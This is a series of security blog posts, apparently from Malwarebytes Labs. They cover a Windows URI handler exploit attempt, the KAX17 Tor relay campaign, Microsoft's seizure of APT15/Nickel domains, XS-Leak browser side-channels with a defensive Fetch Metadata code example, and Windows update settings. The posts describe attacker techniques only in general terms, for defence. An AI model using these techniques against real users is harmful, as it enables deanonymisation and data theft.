Unfortunately, I was unable to confirm this. None of my Windows 10 machines have Edge Legacy installed and IE crashes on every exploit attempt, which is also annoying but not what I was waiting to see. When I tried it on the latest version of Edge, Malwarebytes Browser Guard blocked the download of the “outlook.exe.”

Anyway. This goes to show it pays to actually read the prompts and hover the links.

[Image: example prompt in Edge. Caption: It always pays off to pay attention before clicking a link]

Stay safe, everyone!

The post Vulnerability in Windows 10 URI handler leads to remote code execution appeared first on Malwarebytes Labs.

Was threat actor KAX17 de-anonymizing the Tor network?

A mysterious threat actor has run thousands of malicious servers in entry, middle, and exit positions of the Tor network. Tracked as KAX17, the threat actor ran at its peak more than 900 malicious servers in the Tor network, which typically hovers around a daily total of 9,000-10,000 relays.

Tor nodes

The Tor network, as defined by the official website, is a group of volunteer-operated servers that improve the privacy and security of one’s data. Tor nodes are also referred to as routers or relays. They receive traffic on the Tor network and pass it along. A series of virtual tunnels is created between all nodes of the Tor network, and for each data transmission a random path of tunnels, known as the relay path, is chosen.

Some of these servers work as entry-guards, others as middle-relays, and yet others as exit-nodes from the Tor network. All Tor traffic passes through at least three relays before it reaches its destination.

Servers without contact information

Servers added to the Tor network typically must have contact information included in their setup, such as an email address, so Tor network administrators and law enforcement can contact server operators in the case of a misconfiguration or file an abuse report.

This policy, however, is not policed very strictly, mainly to ensure there’s always a sufficiently large number of nodes. But a security researcher and Tor node operator going by Nusenu told The Record this week that they observed a pattern in some of these Tor relays with no contact information, which they first noticed in 2019 and have traced back as far as 2017.

Grouping the servers by similarities, the researcher arrived at a threat actor they named KAX17. This threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating hundreds of servers at any given point. These servers are typically located in data centers spread all over the world and are primarily configured as entry and middle points, although KAX17 also operates a small number of exit points.

The purpose

Given the number of servers KAX17 ran, the calculated probability that a Tor user would enter the Tor network through one of KAX17’s servers was 16%, the chance of passing through one of its middle relays was 35%, and the chance of exiting through one of its exit nodes was up to 5%.

This would give the threat actor ample opportunity to perform a Sybil attack. A Sybil attack is a type of attack on a computer network service where an attacker subverts the service’s reputation system by creating a large number of pseudonymous identities and uses them to gain a disproportionately large influence. This could lead to the deanonymization of Tor users and/or onion services.

Given the cost and effort put into this, and the fact that actors performing attacks from non-exit positions are considered more advanced adversaries (these attacks require a higher level of sophistication and are less trivial to pull off), it is highly likely this is the work of a high-level (state-sponsored?) threat actor. As for who is behind this group, neither Nusenu nor the Tor Project wanted to speculate.

A spokesperson for the Tor Project confirmed Nusenu’s latest findings and said it had also removed a batch of KAX17 malicious relays.

“Once we got contacted, we looked through all the relays in the network and identified several hundred relays that are very likely belonging to the same group and removed them on November 8.”

Exit nodes

Other malicious actors have been known to control a large percentage of the exit nodes. These exit nodes were used in man-in-the-middle attacks to remove encryption from web traffic where possible, a technique known as SSL stripping, primarily targeting cryptocurrency-related traffic, especially visitors to Bitcoin and cryptocurrency tumbling services. For example, the attacker can redirect the user to cryptocurrency sites that feature the attacker’s Bitcoin wallet address in the hope that the user won’t notice the difference. If the user doesn’t pay attention, they’ll send their cryptocurrency to the attacker rather than to the website or service, losing it in the process.

How to stay safe

Traffic that leaves the Tor network through an exit node using the standard HTTP protocol is unencrypted, which gives a malicious exit node complete access to its content.

How you can prevent this:

  • The easiest way to stay safe from bad exit nodes is not to use them. If you stay within Tor hidden services (the Dark Web), you can keep all your communications encrypted. This works well when possible, but it isn’t always practical.
  • Use end-to-end encryption. More sites than ever are using HTTPS to secure your communications, rather than the old, insecure HTTP standard.
  • Use websites and services that don’t report on your activities as a matter of course. As an example, switching from Google search to DuckDuckGo reduces your trackable data footprint.
  • Do not use any personally identifiable information. Again, not always practical, but worth limiting it as much as you can.
  • Avoid sites and services that require you to log in. After all, sending your login credentials through a malicious Tor exit node would compromise the login.
  • Use a VPN. A Virtual Private Network (VPN) keeps you safe from malicious exit nodes by continuing to encrypt your data once it leaves the Tor Network.

Stay safe, everyone!

The post Was threat actor KAX17 de-anonymizing the Tor network? appeared first on Malwarebytes Labs.

A chink in the armor of China-based hacking group Nickel

Microsoft has taken control of 42 web domains that a hacking group was using to try to breach its targets.

On December 2, the Microsoft Digital Crimes Unit (DCU) filed pleadings with the US District Court for the Eastern District of Virginia seeking authority to take control of the sites that it discovered belonged to a China-based group it calls Nickel. The court order was unsealed December 6 following completion of service on the hosting providers, and traffic from the websites is now routed to computer servers controlled by Microsoft.

The disruption is unlikely to prevent Nickel from pursuing its hacking activities, but it has put a spanner in its works, effectively removing a key piece of the infrastructure the group has been relying on for its latest wave of attacks. Sadly, any setback to the Chinese hacking group or others will likely be temporary as the hackers will find and build new infrastructure to use in forthcoming attacks.

Nickel

Others in the security community who have researched this group of actors refer to the group by other names, including KE3CHANG, APT15, Vixen Panda, Royal APT, and Playful Dragon. Malwarebytes generally uses the APT15 designation for this group.

[Image: An overview of Chinese hacking groups and their aliases]

The group’s activities have been traced back to 2010 when it performed a cyberespionage campaign directed at diplomatic organizations and missions in Europe.

Targets, methods, and techniques

Nickel’s techniques vary, but in the end the group’s activity has only one objective: to implant stealthy malware for getting into networks, stealing data, and spying on government agencies, think tanks, and human rights organizations.

For initial access, the DCU noticed Nickel using older, and patched, vulnerabilities in Microsoft products like Microsoft Exchange and SharePoint, but also compromised VPN suppliers or obtained stolen credentials. For lateral movement the DCU saw Nickel actors using Mimikatz, WDigest, NTDSDump, and other password dumping tools during attacks.

Then followed a drop of hard-to-detect malware that enabled intrusions, surveillance and data theft targeting organizations in Argentina, Barbados, Bosnia-Herzegovina, Brazil, Bulgaria, Chile, Colombia, Croatia, Czech Republic, Dominican Republic, Ecuador, El Salvador, France, Guatemala, Honduras, Hungary, Italy, Jamaica, Mali, Mexico, Montenegro, Panama, Peru, Portugal, Switzerland, Trinidad & Tobago, the UK, US, and Venezuela.

As a result, Nickel achieved long-term access to several targets, allowing the group to conduct activities such as regularly scheduled exfiltration of data. Microsoft Threat Intelligence Center (MSTIC) observed Nickel perform frequent and scheduled data collection and exfiltration from victim networks. The group’s activity included looking in directories of interest for new files added since the last time it collected data.

One method Nickel uses to hide malware is to drop it into existing installed software paths. The group did this to make the malware appear to be files used for an installed application. These are backdoors capable of collecting system information and have basic backdoor functionalities, including, but not limited to:

  • Launching a process
  • Uploading a file
  • Downloading a file
  • Executing a shellcode in memory

A long list of IOCs can be found at the end of this write-up about Nickel by MSTIC.

International cooperation

The Microsoft blog includes a call-to-action for industry, governments, civil society, and others to come together and establish a new consensus for what is and isn’t appropriate behavior in cyberspace. There are some promising developments in this area, like the United States and the European Union joining the Paris Call for Trust and Security in Cyberspace, the Oxford Process which has brought together some of the best legal minds to evaluate the application of international law to cyberspace, and the United Nations taking critical steps to advance dialogue across stakeholders. Nevertheless, every entity with the relevant expertise and resources needs to do whatever they can to help bolster trust in technology and protect the digital ecosystem.

Stay safe, everyone!

The post A chink in the armor of China-based hacking group Nickel appeared first on Malwarebytes Labs.

Is your web browser vulnerable to data theft? XS-Leak explained

In recent news, IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have disclosed 14 new cross-site leak (also known as XSLeak or XS-Leak) attacks that affect modern browsers, such as Google Chrome, Microsoft Edge, Mozilla Firefox, and Apple’s Safari. Although the news and press release regarding this haven’t mentioned other Chromium-based and Firefox-based browsers, we can make a cautious assumption that these, too, could be vulnerable to the new XS-Leak attacks.

But what is XS-Leak? Why should internet users be worried about them? And how can they protect themselves from such web threats?

XS-Leak, explained

An XS-Leak is a type of attack that targets inherent side-channels of a web platform, allowing actors to bypass the ‘same-origin’ policy (SOP) in web browsers so they can steal user information in the background from trusted and legitimate websites. A side-channel can operate as an information leakage channel, as it “allows an attacker to infer information about a secret by observing nonfunctional characteristics of a program, such as execution time or memory consumed.” [1]

The “same-origin policy” is a critical security mechanism. Its purpose is to prevent information from being stolen from websites that users trust. It does this by restricting how documents and scripts from one origin (the URL location) can interact with resources on another origin. Without this policy, an attacker who successfully compromises a script could see everything in a user’s browser.

Browsers support various interactions between websites and web applications. XS-Leaks take advantage of a minute amount of data that is exposed every time this interaction happens between websites.

[Image: An example of an XS-Leak attack flow. In this scenario, the researchers explained that a victim accesses a malicious website (Origin 1), which then requests a resource using an inclusion method. The threat actor then uses XS-Leaks to determine the victim’s user state. (Source: XSinator)]

XS-Leaks Wiki further explains: “The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to.”

XS-Leaks have been around since at least the year 2000, and 34 of them have been identified and classified. XS-Leaks can be caused by different things, such as browser APIs, browser implementation details and bugs, and hardware bugs (like the vulnerabilities in modern processors that Meltdown and Spectre exploit).

What is the XSinator?

XSinator is a “browser test suite”, an online tool that anyone can use to automatically scan their mobile or desktop browser for XS-Leak vulnerabilities. XSinator.com was created as accompanying material for the researchers’ paper entitled “XSinator.com: From a formal Model to the Automatic Evaluation of Cross-Site Leaks in Web Browsers” [PDF].

[Image: Overview of the XSinator website]

How can I protect myself from XS-Leaks?

Mitigating the risks presented by XS-Leaks falls largely into the hands of web browser developers, and they continue to work on it: some browsers have already implemented a number of new defense mechanisms against these attacks.

IT security researchers from both universities have informed the web browser development teams of their findings, and those teams are currently fixing the issues. The researchers also made available, in their paper, detailed technical defenses that browser developers can implement against XS-Leaks.
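Browser fixes are only one side of the defense; a website can also refuse the cross-site requests that XS-Leaks rely on. The following is an added example, not code from the post or from the XSinator researchers: a server-side resource isolation policy built on the browser’s Fetch Metadata request headers (Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest), together with the response headers that opt a page into cross-origin isolation. The header names are real web-platform headers; the sample requests are constructed, and the function and variable names are this example’s own.

```javascript
// Added example: resource isolation with Fetch Metadata. Cross-site requests
// from a malicious origin (<img>, <script>, fetch(), <object> ...) are the
// inclusion methods XS-Leaks use to observe a victim's state on our site;
// refusing them removes the side-channel at the source.

// Decide whether a request may be served. `headers` is a map of lower-cased
// request header names to values; returns { allow, reason }.
function resourceIsolationPolicy(headers, method) {
  const site = headers['sec-fetch-site'];
  const mode = headers['sec-fetch-mode'];
  const dest = headers['sec-fetch-dest'];
  // Older browsers send no Fetch Metadata at all: allow, other defenses apply.
  if (site === undefined) return { allow: true, reason: 'no fetch metadata' };
  // Same-origin, same-site and user-initiated (address bar, bookmark) requests.
  if (site === 'same-origin' || site === 'same-site' || site === 'none') {
    return { allow: true, reason: 'not cross-site' };
  }
  // Cross-site GET navigations are normal links, except when the destination
  // is an embeddable <object>/<embed>, which can be used to probe responses.
  if (mode === 'navigate' && method === 'GET' && dest !== 'object' && dest !== 'embed') {
    return { allow: true, reason: 'cross-site top-level navigation' };
  }
  // Everything else: cross-site fetch/XHR, images, scripts, frames, POST navigations.
  return { allow: false, reason: `cross-site ${mode} request to ${dest} refused` };
}

// Response headers that cut off further cross-origin observation channels.
function isolationResponseHeaders() {
  return {
    'Cross-Origin-Opener-Policy': 'same-origin',   // severs window.opener links
    'Cross-Origin-Resource-Policy': 'same-origin', // blocks cross-origin no-cors reads
    'X-Frame-Options': 'DENY',                     // no cross-site framing
    'Vary': 'Sec-Fetch-Site',                      // caches must key on the decision
  };
}

// Constructed sample requests, as a browser would label them.
const SAMPLE_REQUESTS = [
  { name: 'same-origin API call', method: 'GET',
    headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty' } },
  { name: 'cross-site image inclusion', method: 'GET',
    headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'image' } },
  { name: 'cross-site link click', method: 'GET',
    headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document' } },
  { name: 'cross-site <object> probe', method: 'GET',
    headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'object' } },
];

// Evaluate every sample; returns [{ name, allow, reason }, ...].
function evaluateSamples() {
  return SAMPLE_REQUESTS.map(r => ({ name: r.name, ...resourceIsolationPolicy(r.headers, r.method) }));
}

for (const result of evaluateSamples()) console.log(result);
```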

The post Is your web browser vulnerable to data theft? XS-Leak explained appeared first on Malwarebytes Labs.

How to check for Windows updates and install them

Keeping Windows up to date is an important part of warding off malware, exploits, and other attacks. If you’re not running the latest version of your OS, it can give cybercriminals the leverage they need to compromise your system.

Unfortunately, not all machines run automatic updates by default, depending on your operating system. This used to be primarily a problem on older versions of Windows. With something like Windows 10, you can’t hold back the update tide forever. The best you can do is pause updates for up to 35 days, at which point the only way you can pause again is to install the new updates.

Outside of the pause/repeat cycle, most folks would resort to registry edits to go without an update for longer periods. This isn’t recommended for most users. If you’re a regular home user, there are probably not many specific edge-case reasons why you’d want to have updates switched off.

How to check your Windows update status

Your updates should in theory be running in the background.

If you want to check whether they are, type “Windows update” into the search bar from the Start menu, and click into the Updates section. There, you’ll find a wide range of options and information.

At the very top, you’ll see if you’re up to date or not along with the time the computer last checked. From here, you can also manually check for updates.

If there are additional updates soon to be coming down the pipeline, you’ll also be able to see what they are, along with some details about the update. You can download and install manually before the updates are grabbed automatically.

If your system isn’t compatible with Windows 11, there’ll be a big box letting you know, along with the option to grab the Microsoft PC Health Check App. This will explain in more detail why you may not be able to meet system requirements for Windows 11.

Check your Windows update settings

Underneath the Windows 11 status box is a selection of fine tuning options related to Windows updates. These are:

Pause updates for 7 days. The length of pause required can be altered to your liking in the advanced options (to a maximum of 35 days).

Change active hours. This is for letting Microsoft know which time is best for updates, downloads, and so on. Many folks leave their PCs on overnight, so having all the update heavy lifting take place while asleep is ideal for them. Will you be out during the day? No problem, maybe daytime updates would fit your routine better.

View update history. This can be useful for troubleshooting or just keeping up to date with what’s been going on. Maybe a specific update went AWOL somehow. This is where you’d likely begin your search.

Advanced options. This is where you can alter the pause length for updates. You can also tell the device to receive updates for other Microsoft products when you update Windows. There are additional options for downloading over metered connections, restarting the device “as soon as possible” when a restart is required to install an update, and also various rules for on-screen notifications.

Is Windows update free?

Absolutely, and we recommend you make full use of its capabilities. Your devices will be that little bit more secure with regular automatic updates enabled.

The post How to check for Windows updates and install them appeared first on Malwarebytes Labs.